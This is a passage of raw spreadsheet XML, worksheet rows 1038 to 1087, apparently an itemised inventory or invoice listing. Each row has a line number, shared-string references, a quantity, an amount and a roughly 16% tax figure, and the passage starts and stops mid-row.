      <c r="F1038" s="9"/>
      <c r="G1038" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1038" s="10">
        <v>1</v>
      </c>
      <c r="I1038" s="14">
        <v>87.89</v>
      </c>
      <c r="J1038" s="15">
        <v>14.0624</v>
      </c>
      <c r="K1038" s="16"/>
    </row>
    <row r="1039" spans="2:11">
      <c r="B1039" s="9">
        <v>1067</v>
      </c>
      <c r="C1039" s="238" t="s">
        <v>7434</v>
      </c>
      <c r="D1039" s="238" t="s">
        <v>7435</v>
      </c>
      <c r="E1039" s="238" t="s">
        <v>7436</v>
      </c>
      <c r="F1039" s="9"/>
      <c r="G1039" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1039" s="10">
        <v>1</v>
      </c>
      <c r="I1039" s="14">
        <v>120</v>
      </c>
      <c r="J1039" s="15">
        <v>19.2</v>
      </c>
      <c r="K1039" s="16"/>
    </row>
    <row r="1040" spans="2:11">
      <c r="B1040" s="9">
        <v>1068</v>
      </c>
      <c r="C1040" s="238" t="s">
        <v>7437</v>
      </c>
      <c r="D1040" s="238" t="s">
        <v>7438</v>
      </c>
      <c r="E1040" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1040" s="238" t="s">
        <v>7439</v>
      </c>
      <c r="G1040" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1040" s="10">
        <v>66</v>
      </c>
      <c r="I1040" s="14">
        <v>622.48</v>
      </c>
      <c r="J1040" s="15">
        <v>99.5808</v>
      </c>
      <c r="K1040" s="16"/>
    </row>
    <row r="1041" spans="2:11">
      <c r="B1041" s="9">
        <v>1069</v>
      </c>
      <c r="C1041" s="238" t="s">
        <v>7440</v>
      </c>
      <c r="D1041" s="238" t="s">
        <v>7441</v>
      </c>
      <c r="E1041" s="238" t="s">
        <v>7442</v>
      </c>
      <c r="F1041" s="9"/>
      <c r="G1041" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1041" s="10">
        <v>7</v>
      </c>
      <c r="I1041" s="14">
        <v>2603.52</v>
      </c>
      <c r="J1041" s="15">
        <v>416.5616</v>
      </c>
      <c r="K1041" s="16"/>
    </row>
    <row r="1042" spans="2:11">
      <c r="B1042" s="9">
        <v>1070</v>
      </c>
      <c r="C1042" s="238" t="s">
        <v>7443</v>
      </c>
      <c r="D1042" s="238" t="s">
        <v>7444</v>
      </c>
      <c r="E1042" s="238" t="s">
        <v>7445</v>
      </c>
      <c r="F1042" s="9"/>
      <c r="G1042" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1042" s="10">
        <v>5</v>
      </c>
      <c r="I1042" s="14">
        <v>3128.42</v>
      </c>
      <c r="J1042" s="15">
        <v>500.544</v>
      </c>
      <c r="K1042" s="16"/>
    </row>
    <row r="1043" spans="2:11">
      <c r="B1043" s="9">
        <v>1071</v>
      </c>
      <c r="C1043" s="238" t="s">
        <v>7446</v>
      </c>
      <c r="D1043" s="238" t="s">
        <v>7447</v>
      </c>
      <c r="E1043" s="238" t="s">
        <v>7448</v>
      </c>
      <c r="F1043" s="9"/>
      <c r="G1043" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1043" s="10">
        <v>2</v>
      </c>
      <c r="I1043" s="14">
        <v>512.69</v>
      </c>
      <c r="J1043" s="15">
        <v>82.032</v>
      </c>
      <c r="K1043" s="16"/>
    </row>
    <row r="1044" spans="2:11">
      <c r="B1044" s="9">
        <v>1072</v>
      </c>
      <c r="C1044" s="238" t="s">
        <v>7449</v>
      </c>
      <c r="D1044" s="238" t="s">
        <v>7450</v>
      </c>
      <c r="E1044" s="238" t="s">
        <v>7451</v>
      </c>
      <c r="F1044" s="9"/>
      <c r="G1044" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1044" s="10">
        <v>3</v>
      </c>
      <c r="I1044" s="14">
        <v>1351.71</v>
      </c>
      <c r="J1044" s="15">
        <v>216.2736</v>
      </c>
      <c r="K1044" s="16"/>
    </row>
    <row r="1045" spans="2:11">
      <c r="B1045" s="9">
        <v>1073</v>
      </c>
      <c r="C1045" s="238" t="s">
        <v>7452</v>
      </c>
      <c r="D1045" s="238" t="s">
        <v>7453</v>
      </c>
      <c r="E1045" s="238" t="s">
        <v>7454</v>
      </c>
      <c r="F1045" s="9"/>
      <c r="G1045" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H1045" s="10">
        <v>2</v>
      </c>
      <c r="I1045" s="14">
        <v>2213.11</v>
      </c>
      <c r="J1045" s="15">
        <v>354.0992</v>
      </c>
      <c r="K1045" s="16"/>
    </row>
    <row r="1046" spans="2:11">
      <c r="B1046" s="9">
        <v>1074</v>
      </c>
      <c r="C1046" s="238" t="s">
        <v>7455</v>
      </c>
      <c r="D1046" s="238" t="s">
        <v>7456</v>
      </c>
      <c r="E1046" s="238" t="s">
        <v>7457</v>
      </c>
      <c r="F1046" s="9"/>
      <c r="G1046" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1046" s="10">
        <v>2</v>
      </c>
      <c r="I1046" s="14">
        <v>87.42</v>
      </c>
      <c r="J1046" s="15">
        <v>13.9872</v>
      </c>
      <c r="K1046" s="16"/>
    </row>
    <row r="1047" spans="2:11">
      <c r="B1047" s="9">
        <v>1075</v>
      </c>
      <c r="C1047" s="238" t="s">
        <v>7458</v>
      </c>
      <c r="D1047" s="238" t="s">
        <v>7459</v>
      </c>
      <c r="E1047" s="238" t="s">
        <v>7460</v>
      </c>
      <c r="F1047" s="9"/>
      <c r="G1047" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1047" s="10">
        <v>2</v>
      </c>
      <c r="I1047" s="14">
        <v>128.93</v>
      </c>
      <c r="J1047" s="15">
        <v>20.6304</v>
      </c>
      <c r="K1047" s="16"/>
    </row>
    <row r="1048" spans="2:11">
      <c r="B1048" s="9">
        <v>1076</v>
      </c>
      <c r="C1048" s="238" t="s">
        <v>7461</v>
      </c>
      <c r="D1048" s="238" t="s">
        <v>7462</v>
      </c>
      <c r="E1048" s="238" t="s">
        <v>7463</v>
      </c>
      <c r="F1048" s="9"/>
      <c r="G1048" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1048" s="10">
        <v>1</v>
      </c>
      <c r="I1048" s="14">
        <v>38.46</v>
      </c>
      <c r="J1048" s="15">
        <v>6.1536</v>
      </c>
      <c r="K1048" s="16"/>
    </row>
    <row r="1049" spans="2:11">
      <c r="B1049" s="9">
        <v>1077</v>
      </c>
      <c r="C1049" s="238" t="s">
        <v>7464</v>
      </c>
      <c r="D1049" s="238" t="s">
        <v>7465</v>
      </c>
      <c r="E1049" s="238" t="s">
        <v>7466</v>
      </c>
      <c r="F1049" s="9"/>
      <c r="G1049" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1049" s="10">
        <v>2</v>
      </c>
      <c r="I1049" s="14">
        <v>1740.99</v>
      </c>
      <c r="J1049" s="15">
        <v>278.56</v>
      </c>
      <c r="K1049" s="16"/>
    </row>
    <row r="1050" spans="2:11">
      <c r="B1050" s="9">
        <v>1078</v>
      </c>
      <c r="C1050" s="238" t="s">
        <v>7467</v>
      </c>
      <c r="D1050" s="238" t="s">
        <v>7468</v>
      </c>
      <c r="E1050" s="238" t="s">
        <v>7469</v>
      </c>
      <c r="F1050" s="9"/>
      <c r="G1050" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1050" s="10">
        <v>10</v>
      </c>
      <c r="I1050" s="14">
        <v>845.52</v>
      </c>
      <c r="J1050" s="15">
        <v>135.28</v>
      </c>
      <c r="K1050" s="16"/>
    </row>
    <row r="1051" spans="2:11">
      <c r="B1051" s="9">
        <v>1079</v>
      </c>
      <c r="C1051" s="238" t="s">
        <v>7470</v>
      </c>
      <c r="D1051" s="238" t="s">
        <v>7471</v>
      </c>
      <c r="E1051" s="238" t="s">
        <v>7472</v>
      </c>
      <c r="F1051" s="9"/>
      <c r="G1051" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H1051" s="10">
        <v>4</v>
      </c>
      <c r="I1051" s="14">
        <v>1405.04</v>
      </c>
      <c r="J1051" s="15">
        <v>224.8064</v>
      </c>
      <c r="K1051" s="16"/>
    </row>
    <row r="1052" spans="2:11">
      <c r="B1052" s="9">
        <v>1080</v>
      </c>
      <c r="C1052" s="238" t="s">
        <v>7473</v>
      </c>
      <c r="D1052" s="238" t="s">
        <v>7474</v>
      </c>
      <c r="E1052" s="238" t="s">
        <v>7475</v>
      </c>
      <c r="F1052" s="9"/>
      <c r="G1052" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1052" s="10">
        <v>3</v>
      </c>
      <c r="I1052" s="14">
        <v>717.65</v>
      </c>
      <c r="J1052" s="15">
        <v>114.8256</v>
      </c>
      <c r="K1052" s="16"/>
    </row>
    <row r="1053" spans="2:11">
      <c r="B1053" s="9">
        <v>1081</v>
      </c>
      <c r="C1053" s="238" t="s">
        <v>7476</v>
      </c>
      <c r="D1053" s="238" t="s">
        <v>7477</v>
      </c>
      <c r="E1053" s="238" t="s">
        <v>7478</v>
      </c>
      <c r="F1053" s="238" t="s">
        <v>7479</v>
      </c>
      <c r="G1053" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1053" s="10">
        <v>1</v>
      </c>
      <c r="I1053" s="14">
        <v>45.36</v>
      </c>
      <c r="J1053" s="15">
        <v>7.2576</v>
      </c>
      <c r="K1053" s="16"/>
    </row>
    <row r="1054" spans="2:11">
      <c r="B1054" s="9">
        <v>1082</v>
      </c>
      <c r="C1054" s="238" t="s">
        <v>7480</v>
      </c>
      <c r="D1054" s="238" t="s">
        <v>7481</v>
      </c>
      <c r="E1054" s="238" t="s">
        <v>7482</v>
      </c>
      <c r="F1054" s="9"/>
      <c r="G1054" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1054" s="10">
        <v>2</v>
      </c>
      <c r="I1054" s="14">
        <v>581.19</v>
      </c>
      <c r="J1054" s="15">
        <v>92.992</v>
      </c>
      <c r="K1054" s="16"/>
    </row>
    <row r="1055" spans="2:11">
      <c r="B1055" s="9">
        <v>1083</v>
      </c>
      <c r="C1055" s="238" t="s">
        <v>7483</v>
      </c>
      <c r="D1055" s="238" t="s">
        <v>7484</v>
      </c>
      <c r="E1055" s="238" t="s">
        <v>7485</v>
      </c>
      <c r="F1055" s="9"/>
      <c r="G1055" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1055" s="10">
        <v>5</v>
      </c>
      <c r="I1055" s="14">
        <v>252.13</v>
      </c>
      <c r="J1055" s="15">
        <v>40.344</v>
      </c>
      <c r="K1055" s="16"/>
    </row>
    <row r="1056" spans="2:11">
      <c r="B1056" s="9">
        <v>1084</v>
      </c>
      <c r="C1056" s="238" t="s">
        <v>7486</v>
      </c>
      <c r="D1056" s="238" t="s">
        <v>7487</v>
      </c>
      <c r="E1056" s="238" t="s">
        <v>7488</v>
      </c>
      <c r="F1056" s="9"/>
      <c r="G1056" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1056" s="10">
        <v>1</v>
      </c>
      <c r="I1056" s="14">
        <v>665.55</v>
      </c>
      <c r="J1056" s="15">
        <v>106.488</v>
      </c>
      <c r="K1056" s="16"/>
    </row>
    <row r="1057" spans="2:11">
      <c r="B1057" s="9">
        <v>1085</v>
      </c>
      <c r="C1057" s="238" t="s">
        <v>7489</v>
      </c>
      <c r="D1057" s="238" t="s">
        <v>7490</v>
      </c>
      <c r="E1057" s="238" t="s">
        <v>7491</v>
      </c>
      <c r="F1057" s="9"/>
      <c r="G1057" s="237" t="s">
        <v>5045</v>
      </c>
      <c r="H1057" s="10">
        <v>1</v>
      </c>
      <c r="I1057" s="14">
        <v>21.22</v>
      </c>
      <c r="J1057" s="15">
        <v>3.3952</v>
      </c>
      <c r="K1057" s="16"/>
    </row>
    <row r="1058" spans="2:11">
      <c r="B1058" s="9">
        <v>1086</v>
      </c>
      <c r="C1058" s="238" t="s">
        <v>7492</v>
      </c>
      <c r="D1058" s="238" t="s">
        <v>7493</v>
      </c>
      <c r="E1058" s="238" t="s">
        <v>7494</v>
      </c>
      <c r="F1058" s="9"/>
      <c r="G1058" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H1058" s="10">
        <v>1</v>
      </c>
      <c r="I1058" s="14">
        <v>35.64</v>
      </c>
      <c r="J1058" s="15">
        <v>5.7024</v>
      </c>
      <c r="K1058" s="16"/>
    </row>
    <row r="1059" spans="2:11">
      <c r="B1059" s="9">
        <v>1087</v>
      </c>
      <c r="C1059" s="238" t="s">
        <v>7495</v>
      </c>
      <c r="D1059" s="238" t="s">
        <v>7496</v>
      </c>
      <c r="E1059" s="238" t="s">
        <v>7497</v>
      </c>
      <c r="F1059" s="9"/>
      <c r="G1059" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1059" s="10">
        <v>1</v>
      </c>
      <c r="I1059" s="14">
        <v>928.72</v>
      </c>
      <c r="J1059" s="15">
        <v>148.5952</v>
      </c>
      <c r="K1059" s="16"/>
    </row>
    <row r="1060" spans="2:11">
      <c r="B1060" s="9">
        <v>1088</v>
      </c>
      <c r="C1060" s="238" t="s">
        <v>7498</v>
      </c>
      <c r="D1060" s="238" t="s">
        <v>7499</v>
      </c>
      <c r="E1060" s="238" t="s">
        <v>7500</v>
      </c>
      <c r="F1060" s="9"/>
      <c r="G1060" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1060" s="10">
        <v>30</v>
      </c>
      <c r="I1060" s="14">
        <v>168.2</v>
      </c>
      <c r="J1060" s="15">
        <v>26.928</v>
      </c>
      <c r="K1060" s="16"/>
    </row>
    <row r="1061" spans="2:11">
      <c r="B1061" s="9">
        <v>1089</v>
      </c>
      <c r="C1061" s="238" t="s">
        <v>7501</v>
      </c>
      <c r="D1061" s="238" t="s">
        <v>7502</v>
      </c>
      <c r="E1061" s="238" t="s">
        <v>7503</v>
      </c>
      <c r="F1061" s="9"/>
      <c r="G1061" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1061" s="10">
        <v>2</v>
      </c>
      <c r="I1061" s="14">
        <v>174</v>
      </c>
      <c r="J1061" s="15">
        <v>27.84</v>
      </c>
      <c r="K1061" s="16"/>
    </row>
    <row r="1062" spans="2:11">
      <c r="B1062" s="9">
        <v>1090</v>
      </c>
      <c r="C1062" s="238" t="s">
        <v>7504</v>
      </c>
      <c r="D1062" s="238" t="s">
        <v>7505</v>
      </c>
      <c r="E1062" s="238" t="s">
        <v>7506</v>
      </c>
      <c r="F1062" s="9"/>
      <c r="G1062" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1062" s="10">
        <v>2</v>
      </c>
      <c r="I1062" s="14">
        <v>1713.33</v>
      </c>
      <c r="J1062" s="15">
        <v>274.1344</v>
      </c>
      <c r="K1062" s="16"/>
    </row>
    <row r="1063" spans="2:11">
      <c r="B1063" s="9">
        <v>1091</v>
      </c>
      <c r="C1063" s="238" t="s">
        <v>7507</v>
      </c>
      <c r="D1063" s="238" t="s">
        <v>7079</v>
      </c>
      <c r="E1063" s="238" t="s">
        <v>4624</v>
      </c>
      <c r="F1063" s="9"/>
      <c r="G1063" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1063" s="10">
        <v>4</v>
      </c>
      <c r="I1063" s="14">
        <v>1540</v>
      </c>
      <c r="J1063" s="15">
        <v>246.4</v>
      </c>
      <c r="K1063" s="16"/>
    </row>
    <row r="1064" spans="2:11">
      <c r="B1064" s="9">
        <v>1092</v>
      </c>
      <c r="C1064" s="238" t="s">
        <v>7508</v>
      </c>
      <c r="D1064" s="238" t="s">
        <v>7509</v>
      </c>
      <c r="E1064" s="238" t="s">
        <v>7510</v>
      </c>
      <c r="F1064" s="9"/>
      <c r="G1064" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1064" s="10">
        <v>2</v>
      </c>
      <c r="I1064" s="14">
        <v>664.32</v>
      </c>
      <c r="J1064" s="15">
        <v>106.2912</v>
      </c>
      <c r="K1064" s="16"/>
    </row>
    <row r="1065" spans="2:11">
      <c r="B1065" s="9">
        <v>1093</v>
      </c>
      <c r="C1065" s="238" t="s">
        <v>7511</v>
      </c>
      <c r="D1065" s="238" t="s">
        <v>7512</v>
      </c>
      <c r="E1065" s="238" t="s">
        <v>7513</v>
      </c>
      <c r="F1065" s="9"/>
      <c r="G1065" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1065" s="10">
        <v>1</v>
      </c>
      <c r="I1065" s="14">
        <v>165</v>
      </c>
      <c r="J1065" s="15">
        <v>26.4</v>
      </c>
      <c r="K1065" s="16"/>
    </row>
    <row r="1066" spans="2:11">
      <c r="B1066" s="9">
        <v>1094</v>
      </c>
      <c r="C1066" s="238" t="s">
        <v>7514</v>
      </c>
      <c r="D1066" s="238" t="s">
        <v>7515</v>
      </c>
      <c r="E1066" s="238" t="s">
        <v>7516</v>
      </c>
      <c r="F1066" s="9"/>
      <c r="G1066" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H1066" s="10">
        <v>1</v>
      </c>
      <c r="I1066" s="14">
        <v>450</v>
      </c>
      <c r="J1066" s="15">
        <v>72</v>
      </c>
      <c r="K1066" s="16"/>
    </row>
    <row r="1067" spans="2:11">
      <c r="B1067" s="9">
        <v>1095</v>
      </c>
      <c r="C1067" s="238" t="s">
        <v>7517</v>
      </c>
      <c r="D1067" s="238" t="s">
        <v>7518</v>
      </c>
      <c r="E1067" s="238" t="s">
        <v>7519</v>
      </c>
      <c r="F1067" s="9"/>
      <c r="G1067" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1067" s="10">
        <v>6</v>
      </c>
      <c r="I1067" s="14">
        <v>1110</v>
      </c>
      <c r="J1067" s="15">
        <v>177.6</v>
      </c>
      <c r="K1067" s="16"/>
    </row>
    <row r="1068" spans="2:11">
      <c r="B1068" s="9">
        <v>1096</v>
      </c>
      <c r="C1068" s="238" t="s">
        <v>7520</v>
      </c>
      <c r="D1068" s="238" t="s">
        <v>7521</v>
      </c>
      <c r="E1068" s="238" t="s">
        <v>7522</v>
      </c>
      <c r="F1068" s="9"/>
      <c r="G1068" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1068" s="10">
        <v>4</v>
      </c>
      <c r="I1068" s="14">
        <v>162.5</v>
      </c>
      <c r="J1068" s="15">
        <v>26.0032</v>
      </c>
      <c r="K1068" s="16"/>
    </row>
    <row r="1069" spans="2:11">
      <c r="B1069" s="9">
        <v>1097</v>
      </c>
      <c r="C1069" s="238" t="s">
        <v>7523</v>
      </c>
      <c r="D1069" s="238" t="s">
        <v>7524</v>
      </c>
      <c r="E1069" s="238" t="s">
        <v>7525</v>
      </c>
      <c r="F1069" s="9"/>
      <c r="G1069" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1069" s="10">
        <v>155</v>
      </c>
      <c r="I1069" s="14">
        <v>661.53</v>
      </c>
      <c r="J1069" s="15">
        <v>105.896</v>
      </c>
      <c r="K1069" s="16"/>
    </row>
    <row r="1070" spans="2:11">
      <c r="B1070" s="9">
        <v>1098</v>
      </c>
      <c r="C1070" s="238" t="s">
        <v>7526</v>
      </c>
      <c r="D1070" s="238" t="s">
        <v>7527</v>
      </c>
      <c r="E1070" s="238" t="s">
        <v>7528</v>
      </c>
      <c r="F1070" s="238" t="s">
        <v>7529</v>
      </c>
      <c r="G1070" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1070" s="10">
        <v>507</v>
      </c>
      <c r="I1070" s="14">
        <v>3365.03</v>
      </c>
      <c r="J1070" s="15">
        <v>538.6368</v>
      </c>
      <c r="K1070" s="16"/>
    </row>
    <row r="1071" spans="2:11">
      <c r="B1071" s="9">
        <v>1099</v>
      </c>
      <c r="C1071" s="238" t="s">
        <v>7530</v>
      </c>
      <c r="D1071" s="238" t="s">
        <v>7531</v>
      </c>
      <c r="E1071" s="238" t="s">
        <v>7532</v>
      </c>
      <c r="F1071" s="9"/>
      <c r="G1071" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1071" s="10">
        <v>15</v>
      </c>
      <c r="I1071" s="14">
        <v>217.94</v>
      </c>
      <c r="J1071" s="15">
        <v>34.872</v>
      </c>
      <c r="K1071" s="16"/>
    </row>
    <row r="1072" spans="2:11">
      <c r="B1072" s="9">
        <v>1100</v>
      </c>
      <c r="C1072" s="238" t="s">
        <v>7533</v>
      </c>
      <c r="D1072" s="238" t="s">
        <v>7534</v>
      </c>
      <c r="E1072" s="238" t="s">
        <v>7535</v>
      </c>
      <c r="F1072" s="9"/>
      <c r="G1072" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1072" s="10">
        <v>120</v>
      </c>
      <c r="I1072" s="14">
        <v>1060.49</v>
      </c>
      <c r="J1072" s="15">
        <v>169.728</v>
      </c>
      <c r="K1072" s="16"/>
    </row>
    <row r="1073" spans="2:11">
      <c r="B1073" s="9">
        <v>1101</v>
      </c>
      <c r="C1073" s="238" t="s">
        <v>7536</v>
      </c>
      <c r="D1073" s="238" t="s">
        <v>7537</v>
      </c>
      <c r="E1073" s="238" t="s">
        <v>7538</v>
      </c>
      <c r="F1073" s="9"/>
      <c r="G1073" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1073" s="10">
        <v>52</v>
      </c>
      <c r="I1073" s="17"/>
      <c r="J1073" s="15">
        <v>0</v>
      </c>
      <c r="K1073" s="16"/>
    </row>
    <row r="1074" spans="2:11">
      <c r="B1074" s="9">
        <v>1102</v>
      </c>
      <c r="C1074" s="238" t="s">
        <v>7539</v>
      </c>
      <c r="D1074" s="238" t="s">
        <v>7540</v>
      </c>
      <c r="E1074" s="238" t="s">
        <v>7541</v>
      </c>
      <c r="F1074" s="238" t="s">
        <v>7542</v>
      </c>
      <c r="G1074" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1074" s="10">
        <v>18</v>
      </c>
      <c r="I1074" s="17"/>
      <c r="J1074" s="15">
        <v>0</v>
      </c>
      <c r="K1074" s="16"/>
    </row>
    <row r="1075" spans="2:11">
      <c r="B1075" s="9">
        <v>1103</v>
      </c>
      <c r="C1075" s="238" t="s">
        <v>7543</v>
      </c>
      <c r="D1075" s="238" t="s">
        <v>7544</v>
      </c>
      <c r="E1075" s="238" t="s">
        <v>7545</v>
      </c>
      <c r="F1075" s="9"/>
      <c r="G1075" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1075" s="10">
        <v>10</v>
      </c>
      <c r="I1075" s="14">
        <v>73.57</v>
      </c>
      <c r="J1075" s="15">
        <v>11.776</v>
      </c>
      <c r="K1075" s="16"/>
    </row>
    <row r="1076" spans="2:11">
      <c r="B1076" s="9">
        <v>1104</v>
      </c>
      <c r="C1076" s="238" t="s">
        <v>7546</v>
      </c>
      <c r="D1076" s="238" t="s">
        <v>7547</v>
      </c>
      <c r="E1076" s="238" t="s">
        <v>7548</v>
      </c>
      <c r="F1076" s="9"/>
      <c r="G1076" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1076" s="10">
        <v>840</v>
      </c>
      <c r="I1076" s="14">
        <v>13175.96</v>
      </c>
      <c r="J1076" s="15">
        <v>2108.736</v>
      </c>
      <c r="K1076" s="16"/>
    </row>
    <row r="1077" spans="2:11">
      <c r="B1077" s="9">
        <v>1107</v>
      </c>
      <c r="C1077" s="238" t="s">
        <v>7549</v>
      </c>
      <c r="D1077" s="238" t="s">
        <v>6914</v>
      </c>
      <c r="E1077" s="238" t="s">
        <v>7550</v>
      </c>
      <c r="F1077" s="9"/>
      <c r="G1077" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1077" s="10">
        <v>412.39</v>
      </c>
      <c r="I1077" s="14">
        <v>5455.21</v>
      </c>
      <c r="J1077" s="15">
        <v>872.947152</v>
      </c>
      <c r="K1077" s="16"/>
    </row>
    <row r="1078" spans="2:11">
      <c r="B1078" s="9">
        <v>1108</v>
      </c>
      <c r="C1078" s="238" t="s">
        <v>7551</v>
      </c>
      <c r="D1078" s="238" t="s">
        <v>7552</v>
      </c>
      <c r="E1078" s="238" t="s">
        <v>7553</v>
      </c>
      <c r="F1078" s="9"/>
      <c r="G1078" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1078" s="10">
        <v>10</v>
      </c>
      <c r="I1078" s="14">
        <v>9612.82</v>
      </c>
      <c r="J1078" s="15">
        <v>1538.048</v>
      </c>
      <c r="K1078" s="16"/>
    </row>
    <row r="1079" spans="2:11">
      <c r="B1079" s="9">
        <v>1113</v>
      </c>
      <c r="C1079" s="238" t="s">
        <v>7554</v>
      </c>
      <c r="D1079" s="238" t="s">
        <v>5471</v>
      </c>
      <c r="E1079" s="238" t="s">
        <v>7555</v>
      </c>
      <c r="F1079" s="9"/>
      <c r="G1079" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1079" s="10">
        <v>460</v>
      </c>
      <c r="I1079" s="14">
        <v>1258.12</v>
      </c>
      <c r="J1079" s="15">
        <v>504.16</v>
      </c>
      <c r="K1079" s="16"/>
    </row>
    <row r="1080" spans="2:11">
      <c r="B1080" s="9">
        <v>1114</v>
      </c>
      <c r="C1080" s="238" t="s">
        <v>7556</v>
      </c>
      <c r="D1080" s="238" t="s">
        <v>7557</v>
      </c>
      <c r="E1080" s="238" t="s">
        <v>7558</v>
      </c>
      <c r="F1080" s="238" t="s">
        <v>7559</v>
      </c>
      <c r="G1080" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1080" s="10">
        <v>2490</v>
      </c>
      <c r="I1080" s="14">
        <v>5320.51</v>
      </c>
      <c r="J1080" s="15">
        <v>2131.44</v>
      </c>
      <c r="K1080" s="16"/>
    </row>
    <row r="1081" spans="2:11">
      <c r="B1081" s="9">
        <v>1115</v>
      </c>
      <c r="C1081" s="238" t="s">
        <v>7560</v>
      </c>
      <c r="D1081" s="238" t="s">
        <v>7561</v>
      </c>
      <c r="E1081" s="238" t="s">
        <v>7562</v>
      </c>
      <c r="F1081" s="9"/>
      <c r="G1081" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1081" s="10">
        <v>200</v>
      </c>
      <c r="I1081" s="14">
        <v>86.75</v>
      </c>
      <c r="J1081" s="15">
        <v>13.76</v>
      </c>
      <c r="K1081" s="16"/>
    </row>
    <row r="1082" spans="2:11">
      <c r="B1082" s="9">
        <v>1116</v>
      </c>
      <c r="C1082" s="238" t="s">
        <v>7563</v>
      </c>
      <c r="D1082" s="238" t="s">
        <v>7564</v>
      </c>
      <c r="E1082" s="238" t="s">
        <v>7565</v>
      </c>
      <c r="F1082" s="9"/>
      <c r="G1082" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1082" s="10">
        <v>5</v>
      </c>
      <c r="I1082" s="14">
        <v>98.26</v>
      </c>
      <c r="J1082" s="15">
        <v>15.72</v>
      </c>
      <c r="K1082" s="16"/>
    </row>
    <row r="1083" spans="2:11">
      <c r="B1083" s="9">
        <v>1117</v>
      </c>
      <c r="C1083" s="238" t="s">
        <v>7566</v>
      </c>
      <c r="D1083" s="238" t="s">
        <v>7567</v>
      </c>
      <c r="E1083" s="238" t="s">
        <v>7568</v>
      </c>
      <c r="F1083" s="9"/>
      <c r="G1083" s="237" t="s">
        <v>7569</v>
      </c>
      <c r="H1083" s="10">
        <v>1</v>
      </c>
      <c r="I1083" s="14">
        <v>32.47</v>
      </c>
      <c r="J1083" s="15">
        <v>5.1952</v>
      </c>
      <c r="K1083" s="16"/>
    </row>
    <row r="1084" spans="2:11">
      <c r="B1084" s="9">
        <v>1118</v>
      </c>
      <c r="C1084" s="238" t="s">
        <v>7570</v>
      </c>
      <c r="D1084" s="238" t="s">
        <v>7571</v>
      </c>
      <c r="E1084" s="238" t="s">
        <v>6392</v>
      </c>
      <c r="F1084" s="9"/>
      <c r="G1084" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1084" s="10">
        <v>6</v>
      </c>
      <c r="I1084" s="14">
        <v>29.89</v>
      </c>
      <c r="J1084" s="15">
        <v>4.7808</v>
      </c>
      <c r="K1084" s="16"/>
    </row>
    <row r="1085" spans="2:11">
      <c r="B1085" s="9">
        <v>1119</v>
      </c>
      <c r="C1085" s="238" t="s">
        <v>7572</v>
      </c>
      <c r="D1085" s="238" t="s">
        <v>7573</v>
      </c>
      <c r="E1085" s="238" t="s">
        <v>7574</v>
      </c>
      <c r="F1085" s="9"/>
      <c r="G1085" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1085" s="10">
        <v>8</v>
      </c>
      <c r="I1085" s="14">
        <v>66.49</v>
      </c>
      <c r="J1085" s="15">
        <v>10.6368</v>
      </c>
      <c r="K1085" s="16"/>
    </row>
    <row r="1086" spans="2:11">
      <c r="B1086" s="9">
        <v>1120</v>
      </c>
      <c r="C1086" s="238" t="s">
        <v>7575</v>
      </c>
      <c r="D1086" s="238" t="s">
        <v>4791</v>
      </c>
      <c r="E1086" s="238" t="s">
        <v>7576</v>
      </c>
      <c r="F1086" s="238" t="s">
        <v>7577</v>
      </c>
      <c r="G1086" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1086" s="10">
        <v>6.98</v>
      </c>
      <c r="I1086" s="14">
        <v>427.29</v>
      </c>
      <c r="J1086" s="15">
        <v>170.92624</v>
      </c>
      <c r="K1086" s="16"/>
    </row>
    <row r="1087" spans="2:11">
      <c r="B1087" s="9">
        <v>1121</v>
      </c>
      <c r="C1087" s="238" t="s">
        <v>7578</v>
      </c>
      <c r="D1087" s="238" t="s">
        <v>7579</v>
      </c>
      <c r="E1087" s="238" t="s">
        <v>7580</v>
      </c>
      <c r="F1087" s="9"/>
      <c r="G1087" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1087" s="10">
        <v>24.75</v>
      </c>
      <c r="I1087" s="14">
        <v>752.03</v>
      </c>
      <c r="J1087" s="15">
